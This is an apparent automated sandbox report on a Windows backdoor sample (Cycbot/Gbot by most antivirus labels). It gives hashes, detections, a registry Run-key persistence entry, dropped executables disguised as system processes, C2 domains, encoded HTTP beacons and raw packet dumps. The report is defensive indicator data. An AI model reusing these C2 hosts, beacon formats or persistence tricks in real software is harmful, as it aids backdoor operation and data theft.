Analysis Date2014-10-15 19:31:28
MD5a57ef204ebc77a140980cda88a01cc03
SHA175cad4f8138bc4b6b532b79b28b1b52a123a5854

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 771a24cb1c65af3359a25da4ccbbb364 sha1: 40d287df31bb474be11d1ce88672ea4b26a9cd68 size: 137216
Section.rdata md5: a57aa730f26b5ac2fa2d58c410623d2a sha1: 704156053837a62c3ae0515bd7e6032e1b410045 size: 3584
Section.data md5: 60477abf97895d52392ad14a0b30f0b4 sha1: e881b768cdd04536b145fc39389e491979bb3ea0 size: 23552
Section.crt md5: 612542967526d305c29d19635b548808 sha1: 5c65ca729b03b78149be24f7952563c7903b00b8 size: 512
Timestamp2005-11-19 07:41:56
VersionPrivateBuild: 1000
PEhashc614cdd2dea76d3cb782a7d7e545c731163158e0
IMPhashf5891413bec584f5334e7ac3315a8955
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)BDS/Gbot.qt.457
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Gbot.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-199203
AVDr. WebBackDoor.Gbot.2442
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.JXD
AVFortinetW32/FakeAV.PACK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Cryptic.CAM
AVIkarusBackdoor.Win32.Cycbot
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.qt
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BH
AVRisingTrojan.Win32.Generic.1273AEAD
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen2
AVTrend MicroBKDR_CYCBOT.SMIB
AVVirusBlokAda (vba32)Backdoor.Gbot
AVYara APTno_virus
AVZillya!Trojan.FakeAV.Win32.45910

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSbigspiderwomen.com
Winsock DNSsmallspiderwomen.com
Winsock DNS127.0.0.1
Winsock DNSwww.internetsecure.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSwww.internetsecure.com
Type: A
198.203.191.132
DNSzonetf.com
Type: A
141.8.225.80
DNSbigspiderwomen.com
Type: A
DNSsmallspiderwomen.com
Type: A
HTTP GEThttp://www.internetsecure.com/images/ismerch.gif?tq=gP4aKydXpCAa75McGpOkB3hzA8MCjmXKObdJZfjEI3oI9O92sZX%2FQ3jrcbZg1sUheshVzYWKbQl544wLgefdRdwAgBPFzrn3w43o1doxKVe0U%2FNkLBOIuyy713W4Hs3UtFIMG1CB9O8B5q7ITLLHN%2BOjBFVBX0tB7c8IOnMDcDmoPDj%2FiB%2FiYJvBty0pNOxFEF6l28t%2BQ8Fy%2BQsSeuRh1a7bhId2PBqouHqpk8O6%2FAAmua%2FIxZqNO6a8GN1zHUAzjs1eBvWATYANHoDpCJxuKy1pCKnlcQdtK6DM1cuXyMttyEh%2B4HPKRI0r%2FHYW29meL676pN9HGkuRV0BO9bsrLE%2BLjMzN9jGOO0GwDIsZ1ns%2BaBKh4NvYgw8RYgeTZJjG6wL2tWjUpfO%2Bnzl%2FRlBa4SVDFMBvy4lN51zVN%2FJAJS9XmS5xwqJ470yrSZGpw51szMmUNKGm9JgU9lv%2B9lw6Rc6QmMSJ7S7qO%2BL7UBENsMg6W2uvgedoiSW7rwQY7LePzRLSJqo9AjlTYLfLCd5LWguzIMldZuGjKNNiWOd%2BgVWnrtpaJqrqWNpAln
User-Agent: iamx/3.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJvX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNzFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 198.203.191.132:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1039 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1040 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1041 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 69736d65   GET /images/isme
0x00000010 (00016)   7263682e 6769663f 74713d67 5034614b   rch.gif?tq=gP4aK
0x00000020 (00032)   79645870 43416137 354d6347 704f6b42   ydXpCAa75McGpOkB
0x00000030 (00048)   33687a41 384d436a 6d584b4f 62644a5a   3hzA8MCjmXKObdJZ
0x00000040 (00064)   666a4549 336f4939 4f393273 5a582532   fjEI3oI9O92sZX%2
0x00000050 (00080)   4651336a 7263625a 67317355 68657368   FQ3jrcbZg1sUhesh
0x00000060 (00096)   567a5957 4b62516c 35343477 4c676566   VzYWKbQl544wLgef
0x00000070 (00112)   64526477 41674250 467a726e 33773433   dRdwAgBPFzrn3w43
0x00000080 (00128)   6f31646f 784b5665 30552532 464e6b4c   o1doxKVe0U%2FNkL
0x00000090 (00144)   424f4975 79793731 33573448 73335574   BOIuyy713W4Hs3Ut
0x000000a0 (00160)   46494d47 31434239 4f384235 71374954   FIMG1CB9O8B5q7IT
0x000000b0 (00176)   4c4c484e 2532424f 6a424656 42583074   LLHN%2BOjBFVBX0t
0x000000c0 (00192)   42376338 494f6e4d 4463446d 6f50446a   B7c8IOnMDcDmoPDj
0x000000d0 (00208)   25324669 42253246 69594a76 42747930   %2FiB%2FiYJvBty0
0x000000e0 (00224)   704e4f78 46454636 6c323874 25324251   pNOxFEF6l28t%2BQ
0x000000f0 (00240)   38467925 32425173 53657552 68316137   8Fy%2BQsSeuRh1a7
0x00000100 (00256)   62684964 32504271 6f754871 706b384f   bhId2PBqouHqpk8O
0x00000110 (00272)   36253246 41416d75 61253246 49785a71   6%2FAAmua%2FIxZq
0x00000120 (00288)   4e4f3661 38474e31 7a485541 7a6a7331   NO6a8GN1zHUAzjs1
0x00000130 (00304)   65427657 41545941 4e486f44 70434a78   eBvWATYANHoDpCJx
0x00000140 (00320)   754b7931 70434b6e 6c635164 744b3644   uKy1pCKnlcQdtK6D
0x00000150 (00336)   4d316375 58794d74 74794568 25324234   M1cuXyMttyEh%2B4
0x00000160 (00352)   48504b52 49307225 32464859 5732396d   HPKRI0r%2FHYW29m
0x00000170 (00368)   654c3637 36704e39 48476b75 52563042   eL676pN9HGkuRV0B
0x00000180 (00384)   4f396273 724c4525 32424c6a 4d7a4e39   O9bsrLE%2BLjMzN9
0x00000190 (00400)   6a474f4f 30477744 49735a31 6e732532   jGOO0GwDIsZ1ns%2
0x000001a0 (00416)   4261424b 68344e76 59677738 52596765   BaBKh4NvYgw8RYge
0x000001b0 (00432)   545a4a6a 4736774c 3274576a 5570664f   TZJjG6wL2tWjUpfO
0x000001c0 (00448)   2532426e 7a6c2532 46526c42 61345356   %2Bnzl%2FRlBa4SV
0x000001d0 (00464)   44464d42 7679346c 4e35317a 564e2532   DFMBvy4lN51zVN%2
0x000001e0 (00480)   464a414a 5339586d 53357877 714a3437   FJAJS9XmS5xwqJ47
0x000001f0 (00496)   30797253 5a477077 3531737a 4d6d554e   0yrSZGpw51szMmUN
0x00000200 (00512)   4b476d39 4a675539 6c762532 42396c77   KGm9JgU9lv%2B9lw
0x00000210 (00528)   36526336 516d4d53 4a375337 714f2532   6Rc6QmMSJ7S7qO%2
0x00000220 (00544)   424c3755 42454e73 4d673657 32757667   BL7UBENsMg6W2uvg
0x00000230 (00560)   65646f69 53573772 77515937 4c65507a   edoiSW7rwQY7LePz
0x00000240 (00576)   524c534a 716f3941 6a6c5459 4c664c43   RLSJqo9AjlTYLfLC
0x00000250 (00592)   64354c57 67757a49 4d6c645a 75476a4b   d5LWguzIMldZuGjK
0x00000260 (00608)   4e4e6957 4f642532 42675657 6e727470   NNiWOd%2BgVWnrtp
0x00000270 (00624)   614a7172 71574e70 416c6e20 48545450   aJqrqWNpAln HTTP
0x00000280 (00640)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000290 (00656)   3a20636c 6f73650d 0a486f73 743a2077   : close..Host: w
0x000002a0 (00672)   77772e69 6e746572 6e657473 65637572   ww.internetsecur
0x000002b0 (00688)   652e636f 6d0d0a41 63636570 743a202a   e.com..Accept: *
0x000002c0 (00704)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000002d0 (00720)   69616d78 2f332e31 310d0a0d 0a         iamx/3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a38 32353332 20202066 6a454933   ...82532   fjEI3
0x00000160 (00352)   6f49394f 3932735a 5825320a            oI9O92sZX%2.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a73650d   on: close....se.
0x00000150 (00336)   0a0d0a38 32353332 20202066 6a454933   ...82532   fjEI3
0x00000160 (00352)   6f49394f 3932735a 5825320a            oI9O92sZX%2.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a32 20202066 6a454933   ose....2   fjEI3
0x00000160 (00352)   6f49394f 3932735a 5825320a            oI9O92sZX%2.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a794568 25324234   close....yEh%2B4
0x00000160 (00352)   48504b52 49307225 32464859 5732396d   HPKRI0r%2FHYW29m
0x00000170 (00368)   654c3637 36704e39 48476b75 52563042   eL676pN9HGkuRV0B
0x00000180 (00384)   4f396273 724c4525 32424c6a 4d7a4e39   O9bsrLE%2BLjMzN9
0x00000190 (00400)   6a474f4f 30477744 49735a31 6e732532   jGOO0GwDIsZ1ns%2
0x000001a0 (00416)   4261424b 68344e76 59677738 52596765   BaBKh4NvYgw8RYge
0x000001b0 (00432)   545a4a6a 4736774c 3274576a 5570664f   TZJjG6wL2tWjUpfO
0x000001c0 (00448)   2532426e 7a6c2532 46526c42 61345356   %2Bnzl%2FRlBa4SV
0x000001d0 (00464)   44464d42 7679346c 4e35317a 564e2532   DFMBvy4lN51zVN%2
0x000001e0 (00480)   464a414a 5339586d 53357877 714a3437   FJAJS9XmS5xwqJ47
0x000001f0 (00496)   30797253 5a477077 3531737a 4d6d554e   0yrSZGpw51szMmUN
0x00000200 (00512)   4b476d39 4a675539 6c762532 42396c77   KGm9JgU9lv%2B9lw
0x00000210 (00528)   36526336 516d4d53 4a375337 714f2532   6Rc6QmMSJ7S7qO%2
0x00000220 (00544)   424c3755 42454e73 4d673657 32757667   BL7UBENsMg6W2uvg
0x00000230 (00560)   65646f69 53573772 77515937 4c65507a   edoiSW7rwQY7LePz
0x00000240 (00576)   524c534a 716f3941 6a6c5459 4c664c43   RLSJqo9AjlTYLfLC
0x00000250 (00592)   64354c57 67757a49 4d6c645a 75476a4b   d5LWguzIMldZuGjK
0x00000260 (00608)   4e4e6957 4f642532 42675657 6e727470   NNiWOd%2BgVWnrtp
0x00000270 (00624)   614a7172 71574e70 416c6e20 48545450   aJqrqWNpAln HTTP
0x00000280 (00640)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000290 (00656)   3a20636c 6f73650d 0a486f73 743a2077   : close..Host: w
0x000002a0 (00672)   77772e69 6e746572 6e657473 65637572   ww.internetsecur
0x000002b0 (00688)   652e636f 6d0d0a41 63636570 743a202a   e.com..Accept: *
0x000002c0 (00704)   2f2a0d0a 55736572 2d416765 6e743a20   /*..User-Agent: 
0x000002d0 (00720)   69616d78 2f332e31 310d0a0d 0a         iamx/3.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a0d 0a0d0a32 20202066 6a454933   .......2   fjEI3
0x00000160 (00352)   6f49394f 3932735a 5825320a            oI9O92sZX%2.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a765825 32425039 68253242 49307344   JvX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a74   OhLgjh8sG%2BcoJt
0x000000c0 (00192)   58253242 534e7856 4b763937 35586c6d   X%2BSNxVKv975Xlm
